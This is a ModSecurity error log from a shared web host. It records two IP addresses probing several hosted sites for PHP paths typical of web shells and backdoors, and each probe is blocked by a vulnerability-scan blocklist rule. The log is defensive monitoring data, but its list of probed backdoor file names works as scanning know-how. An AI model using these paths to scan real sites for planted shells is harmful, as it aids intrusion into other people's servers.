[Tue May 26 16:35:16.319513 2026] [security2:error] [pid 808625:tid 808789] [client 130.131.224.225:65119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV-bDEl_SBaWibfDmph1QAAACI"]
[Tue May 26 16:35:16.319642 2026] [security2:error] [pid 808625:tid 808789] [client 130.131.224.225:65119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV-bDEl_SBaWibfDmph1QAAACI"]
[Tue May 26 16:35:16.385078 2026] [security2:error] [pid 808625:tid 808822] [client 20.151.117.104:52814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV-bDEl_SBaWibfDmph2wAAAEM"]
[Tue May 26 16:35:16.385199 2026] [security2:error] [pid 808625:tid 808822] [client 20.151.117.104:52814] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV-bDEl_SBaWibfDmph2wAAAEM"]
[Tue May 26 16:35:16.527603 2026] [security2:error] [pid 808625:tid 808765] [client 20.151.117.104:21045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV-bDEl_SBaWibfDmph3wAAAAo"]
[Tue May 26 16:35:16.527721 2026] [security2:error] [pid 808625:tid 808765] [client 20.151.117.104:21045] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV-bDEl_SBaWibfDmph3wAAAAo"]
[Tue May 26 16:35:16.529092 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:64521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahV-bDEl_SBaWibfDmph4AAAAHc"]
[Tue May 26 16:35:16.529195 2026] [security2:error] [pid 808625:tid 808874] [client 130.131.224.225:64521] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahV-bDEl_SBaWibfDmph4AAAAHc"]
[Tue May 26 16:35:16.670015 2026] [security2:error] [pid 808625:tid 808863] [client 20.151.117.104:31257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahV-bDEl_SBaWibfDmph5AAAAGw"]
[Tue May 26 16:35:16.670112 2026] [security2:error] [pid 808625:tid 808863] [client 20.151.117.104:31257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahV-bDEl_SBaWibfDmph5AAAAGw"]
[Tue May 26 16:35:16.813013 2026] [security2:error] [pid 808625:tid 808870] [client 20.151.117.104:25846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-bDEl_SBaWibfDmph5QAAAHM"]
[Tue May 26 16:35:16.813146 2026] [security2:error] [pid 808625:tid 808870] [client 20.151.117.104:25846] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-bDEl_SBaWibfDmph5QAAAHM"]
[Tue May 26 16:35:16.852780 2026] [security2:error] [pid 808625:tid 808832] [client 130.131.224.225:64638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahV-bDEl_SBaWibfDmph5wAAAE0"]
[Tue May 26 16:35:16.852913 2026] [security2:error] [pid 808625:tid 808832] [client 130.131.224.225:64638] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahV-bDEl_SBaWibfDmph5wAAAE0"]
[Tue May 26 16:35:16.956171 2026] [security2:error] [pid 808625:tid 808823] [client 20.151.117.104:35832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/jga.php"] [unique_id "ahV-bDEl_SBaWibfDmph6AAAAEQ"]
[Tue May 26 16:35:16.956269 2026] [security2:error] [pid 808625:tid 808823] [client 20.151.117.104:35832] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/jga.php"] [unique_id "ahV-bDEl_SBaWibfDmph6AAAAEQ"]
[Tue May 26 16:35:16.997981 2026] [security2:error] [pid 808625:tid 808816] [client 130.131.224.225:65070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahV-bDEl_SBaWibfDmph6gAAAD0"]
[Tue May 26 16:35:16.998111 2026] [security2:error] [pid 808625:tid 808816] [client 130.131.224.225:65070] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahV-bDEl_SBaWibfDmph6gAAAD0"]
[Tue May 26 16:35:17.099032 2026] [security2:error] [pid 808625:tid 808797] [client 20.151.117.104:2162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV-bTEl_SBaWibfDmph8AAAACo"]
[Tue May 26 16:35:17.099136 2026] [security2:error] [pid 808625:tid 808797] [client 20.151.117.104:2162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV-bTEl_SBaWibfDmph8AAAACo"]
[Tue May 26 16:35:17.180102 2026] [security2:error] [pid 808625:tid 808795] [client 130.131.224.225:63902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahV-bTEl_SBaWibfDmph9AAAACg"]
[Tue May 26 16:35:17.180203 2026] [security2:error] [pid 808625:tid 808795] [client 130.131.224.225:63902] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahV-bTEl_SBaWibfDmph9AAAACg"]
[Tue May 26 16:35:17.242321 2026] [security2:error] [pid 808625:tid 808853] [client 20.151.117.104:52846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV-bTEl_SBaWibfDmph9QAAAGI"]
[Tue May 26 16:35:17.242415 2026] [security2:error] [pid 808625:tid 808853] [client 20.151.117.104:52846] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV-bTEl_SBaWibfDmph9QAAAGI"]
[Tue May 26 16:35:17.328459 2026] [security2:error] [pid 808625:tid 808806] [client 130.131.224.225:64538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahV-bTEl_SBaWibfDmph9gAAADM"]
[Tue May 26 16:35:17.328543 2026] [security2:error] [pid 808625:tid 808806] [client 130.131.224.225:64538] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahV-bTEl_SBaWibfDmph9gAAADM"]
[Tue May 26 16:35:17.385511 2026] [security2:error] [pid 808625:tid 808809] [client 20.151.117.104:22313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws77.php"] [unique_id "ahV-bTEl_SBaWibfDmph9wAAADY"]
[Tue May 26 16:35:17.385611 2026] [security2:error] [pid 808625:tid 808809] [client 20.151.117.104:22313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws77.php"] [unique_id "ahV-bTEl_SBaWibfDmph9wAAADY"]
[Tue May 26 16:35:17.468907 2026] [security2:error] [pid 808625:tid 808779] [client 130.131.224.225:64561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV-bTEl_SBaWibfDmph-AAAABg"]
[Tue May 26 16:35:17.469020 2026] [security2:error] [pid 808625:tid 808779] [client 130.131.224.225:64561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV-bTEl_SBaWibfDmph-AAAABg"]
[Tue May 26 16:35:17.528484 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:31290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahV-bTEl_SBaWibfDmph-QAAABM"]
[Tue May 26 16:35:17.528595 2026] [security2:error] [pid 808625:tid 808774] [client 20.151.117.104:31290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahV-bTEl_SBaWibfDmph-QAAABM"]
[Tue May 26 16:35:17.598286 2026] [security2:error] [pid 808625:tid 808856] [client 130.131.224.225:64628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahV-bTEl_SBaWibfDmph-gAAAGU"]
[Tue May 26 16:35:17.598405 2026] [security2:error] [pid 808625:tid 808856] [client 130.131.224.225:64628] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahV-bTEl_SBaWibfDmph-gAAAGU"]
[Tue May 26 16:35:17.670814 2026] [security2:error] [pid 808625:tid 808807] [client 20.151.117.104:22283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV-bTEl_SBaWibfDmph_gAAADQ"]
[Tue May 26 16:35:17.670917 2026] [security2:error] [pid 808625:tid 808807] [client 20.151.117.104:22283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV-bTEl_SBaWibfDmph_gAAADQ"]
[Tue May 26 16:35:17.708947 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-bDEl_SBaWibfDmph1AAAAGg"]
[Tue May 26 16:35:17.750457 2026] [security2:error] [pid 808625:tid 808842] [client 130.131.224.225:64572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahV-bTEl_SBaWibfDmph_wAAAFc"]
[Tue May 26 16:35:17.750586 2026] [security2:error] [pid 808625:tid 808842] [client 130.131.224.225:64572] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahV-bTEl_SBaWibfDmph_wAAAFc"]
[Tue May 26 16:35:17.813861 2026] [security2:error] [pid 808625:tid 808804] [client 20.151.117.104:35800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahV-bTEl_SBaWibfDmpiAAAAADE"]
[Tue May 26 16:35:17.813990 2026] [security2:error] [pid 808625:tid 808804] [client 20.151.117.104:35800] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahV-bTEl_SBaWibfDmpiAAAAADE"]
[Tue May 26 16:35:17.887399 2026] [security2:error] [pid 808625:tid 808763] [client 130.131.224.225:65120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/1index.php"] [unique_id "ahV-bTEl_SBaWibfDmpiAQAAAAg"]
[Tue May 26 16:35:17.887540 2026] [security2:error] [pid 808625:tid 808763] [client 130.131.224.225:65120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/1index.php"] [unique_id "ahV-bTEl_SBaWibfDmpiAQAAAAg"]
[Tue May 26 16:35:17.957466 2026] [security2:error] [pid 808625:tid 808861] [client 20.151.117.104:21024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahV-bTEl_SBaWibfDmpiBgAAAGo"]
[Tue May 26 16:35:17.957575 2026] [security2:error] [pid 808625:tid 808861] [client 20.151.117.104:21024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahV-bTEl_SBaWibfDmpiBgAAAGo"]
[Tue May 26 16:35:18.065258 2026] [security2:error] [pid 808625:tid 808770] [client 130.131.224.225:63893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-su.php"] [unique_id "ahV-bjEl_SBaWibfDmpiBwAAAA8"]
[Tue May 26 16:35:18.065401 2026] [security2:error] [pid 808625:tid 808770] [client 130.131.224.225:63893] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-su.php"] [unique_id "ahV-bjEl_SBaWibfDmpiBwAAAA8"]
[Tue May 26 16:35:18.100117 2026] [security2:error] [pid 808625:tid 808759] [client 20.151.117.104:52853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCAAAAAQ"]
[Tue May 26 16:35:18.100220 2026] [security2:error] [pid 808625:tid 808759] [client 20.151.117.104:52853] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/default.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCAAAAAQ"]
[Tue May 26 16:35:18.189635 2026] [security2:error] [pid 808625:tid 808862] [client 130.131.224.225:63966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCQAAAGs"]
[Tue May 26 16:35:18.189763 2026] [security2:error] [pid 808625:tid 808862] [client 130.131.224.225:63966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCQAAAGs"]
[Tue May 26 16:35:18.245705 2026] [security2:error] [pid 808625:tid 808815] [client 20.151.117.104:8422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCgAAADw"]
[Tue May 26 16:35:18.245824 2026] [security2:error] [pid 808625:tid 808815] [client 20.151.117.104:8422] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCgAAADw"]
[Tue May 26 16:35:18.344208 2026] [security2:error] [pid 808625:tid 808819] [client 130.131.224.225:63332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-ver.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCwAAAEA"]
[Tue May 26 16:35:18.344319 2026] [security2:error] [pid 808625:tid 808819] [client 130.131.224.225:63332] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-ver.php"] [unique_id "ahV-bjEl_SBaWibfDmpiCwAAAEA"]
[Tue May 26 16:35:18.388910 2026] [security2:error] [pid 808625:tid 808766] [client 20.151.117.104:21012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/install.php"] [unique_id "ahV-bjEl_SBaWibfDmpiDAAAAAs"]
[Tue May 26 16:35:18.389027 2026] [security2:error] [pid 808625:tid 808766] [client 20.151.117.104:21012] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/install.php"] [unique_id "ahV-bjEl_SBaWibfDmpiDAAAAAs"]
[Tue May 26 16:35:18.512137 2026] [security2:error] [pid 808625:tid 808755] [client 130.131.224.225:62701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/db.php"] [unique_id "ahV-bjEl_SBaWibfDmpiEAAAAAA"]
[Tue May 26 16:35:18.512251 2026] [security2:error] [pid 808625:tid 808755] [client 130.131.224.225:62701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/db.php"] [unique_id "ahV-bjEl_SBaWibfDmpiEAAAAAA"]
[Tue May 26 16:35:18.533406 2026] [security2:error] [pid 808625:tid 808760] [client 20.151.117.104:9769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/tfm.php"] [unique_id "ahV-bjEl_SBaWibfDmpiEQAAAAU"]
[Tue May 26 16:35:18.533521 2026] [security2:error] [pid 808625:tid 808760] [client 20.151.117.104:9769] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/tfm.php"] [unique_id "ahV-bjEl_SBaWibfDmpiEQAAAAU"]
